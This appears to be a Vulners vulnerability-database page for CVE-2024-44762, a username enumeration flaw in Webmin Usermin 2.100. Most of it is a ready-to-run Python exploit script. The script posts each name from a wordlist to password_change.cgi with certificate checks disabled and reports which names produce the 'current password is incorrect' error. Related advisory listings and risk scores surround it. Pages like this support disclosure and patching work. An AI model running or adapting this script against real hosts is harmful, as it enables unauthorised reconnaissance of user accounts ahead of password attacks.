Vulners
Lucene search
Webmin Usermin 2.100 - Username Enumeration
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Generation of Error Message Containing Sensitive Information in Webmin Usermin | 27 Dec 202516:38 | – | githubexploit |
 | November Linux Patch Wednesday | 21 Nov 202516:21 | – | avleonov |
 | CVE-2024-44762 | 16 Oct 202423:55 | – | circl |
 | Webmin Usermin 安全漏洞 | 16 Oct 202400:00 | – | cnnvd |
 | CVE-2024-44762 | 16 Oct 202400:00 | – | cve |
 | CVE-2024-44762 | 16 Oct 202400:00 | – | cvelist |
 | Usermin 2.100 - Username Enumeration | 17 Apr 202500:00 | – | exploitdb |
 | Usermin 2.100 - Username Enumeration | 3 Jun 202606:04 | – | nuclei |
 | CVE-2024-44762 | 16 Oct 202421:15 | – | nvd |
 | CVE-2024-44762 | 16 Oct 202421:15 | – | osv |
10
# Exploit Title: Webmin Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2025 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.15.3
EPSS0.13166
SSVC